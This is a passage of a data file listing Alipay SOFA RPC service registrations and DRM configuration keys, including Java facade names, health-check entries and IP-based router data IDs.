LT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoplaycenter.common.signtask.facade.api.SignInQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.InstCapitalQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledataprod.service.facade.ConsumeLogClassifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_DEFINFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ugstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.comment.KbCommentQuestionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRoleCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFlowControlCallbackFacade:1.0:ccrprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.mng.PermissionPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.hostName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityMaterialFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY@ropservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finmap.core.service.api.ComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gmcore:name=com.alipay.gmcommon.common.components.shop.drm.MerchantReportConfig.riskRejectConfigJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.degrade.DrmSalDegradeManager.deltaSalDegradeJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthclaimmng.discussion.facade.DiscussionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-promocodesite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.insurance.HospitalKnowledgeFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_4_1_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.qrcode.AssetQrcodeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsTaskFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.RuleAnalyzeRouteService:1.0:public@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.cluster.facade.ClusterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucrcenter.service.facade.api.ZmCreditAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.GatewaySffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.YamlAutoTestApiService1021071800:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.goal.GoalSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.QuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifmetadata.common.service.facade.ModelMappingConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morphodatatwa.api.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.salary.SalaryScheduleQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.dataservice.DataServiceApplyInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.TaskConfigServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_EXRATECENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoscene.common.service.facade.api.user.action.UserActionOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yqapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.CreativeContentParserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.MerchantQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.amy.service.facade.GiftServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.standard.api.InsStandardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.StockDiscoveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custview.facade.AuthorizationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.switchCloudBackToCharge,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.delta.facade.api.FlowControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.aliloan.ecmobile.service.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.FundPlanDiagnosticConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthPortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.InstLoanTotalRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:pcreditmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MemberOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.notify.OrderLinkNotifyOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.servicelist.ServiceListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.DayuArkRzoneService:1.0:10@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.alarmanalysis.AlarmWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algoevaluator.common.service.SofaTppForAvaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcReconProgressQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.service.facade.ForceGonganCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitestcenter.common.service.integration.lbs.CallTROnlineMobilelbsClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.credit.PledgeCreditAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openauth_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.price.PricePlanConfigManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:extend-request#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_UIOMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.weather.RealWeatherServiceInCzone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.trigger.FinTriggerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.DecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.biz.service.impl.fundmanage.activitycenter.service.AssetReceivedRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.InteractionTaskTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.LogSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsandbox.service.facade.openAcess.SPIManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.guarcore.common.service.facade.guarantee.api.GuarantyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.GroupCommonRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:supplierAssetApply_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopTaskOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexBillSynchWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.timeSequenceDefaultRecoverTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.151.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findtprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.69.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mymdp.common.service.facade.mpscore.service.domain.MpsBizDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.client.AccountValidator:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.service.facade.api.compatible.SoundWaveC2CFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.config.SimpleChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.text.SecuTextGWManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.whiteUserIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fundManage_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.VerifyProductRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.fundStatusApplyingToBuy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.syncDataUpdateSuccess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crep.request.CrepFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.ccrCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfmdm.common.service.facade.api.MasterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.SystemResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.95.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY@antmobilecloudtest#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Servers_TP_S_PRICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.recommendDaysConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.merchant.CommonRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.xspace.alsc.ActivityQuery4XSpaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.dmp.common.service.facade.api.ContentPoolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizcenter.common.service.facade.api.BizOrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payboss.DeployService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adc.schedule.facade.ScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.process.OrderProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CSCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secdatacontext.common.facade.api.AssetsChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.BumngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.ext.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcClueGangFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.jexlFormat2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaymember.common.service.facade.csplatform.service.MemberPointCertCSPlatformQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cinspfront.common.service.facade.InspectionDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apshopcenter.ApscBizAreaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.spi.RecycleSpi:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.commonCmdProcessThreadPool.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:balSubAccAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.DevelopPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.1.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antfortuneall@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.DadaCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.login.LoginService:1.0:alipayHK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoquality.common.service.facade.CaseInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:pcreditagreement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CreditAgreementClientSwitch.normalSwitchToRpc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.couponcore.common.manager.facade.CouponApprovalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GLOBALREMITPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.100.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iliquidity.biz.manager.env.ParamManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.InvestAdviserProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imatchfacade.ucdpmng.CampaignSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataservice.common.service.facade.BizOrderRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.console.ArcoreEmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.biz.shared.consumeprod.LegoAlarmInnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.231.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.uioservice.common.service.facade.api.ParamConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.c0BlockForceFLag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.taskDemotionDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.tool.OrderToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@utraffictrip#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pkgcore.common.service.facade.runtimeconfigplatfom.RuntimeConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:smartolivetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:kbservcenterVisitRecordDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizExceptionRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.shadowFullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rassistcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:createShopExecutorFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_add_biz_order_node_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcreditgrowup.common.facade.api.LoanAmtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.200.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:sffgroupqiankundemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.facade.pop.CommonPopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_COMPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.48.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbdataquery.common.service.facade.api.MerchantSubsidyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.allLoadSceneTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.familyTagMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.endpoint.rest.facade.DsCfgRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:paymentmngInsttradeTaskcenterCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:zfeecharge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.endpoint.facade.IStreamExecuteInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcache:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.update.ServerUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExFxRateStdProdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbqa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.CreditAuthRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.spi.lifeapp.LifeAppSpiService:1.0:publichome_subscription@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerMasterIdManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.TlouBizGeabaseConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-F-USTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kabaocore.service.facade.PassRemindManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.comment.KbCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.check.CheckOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.20.192.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MOBILECHAT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.rule.AutoMktRuleFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#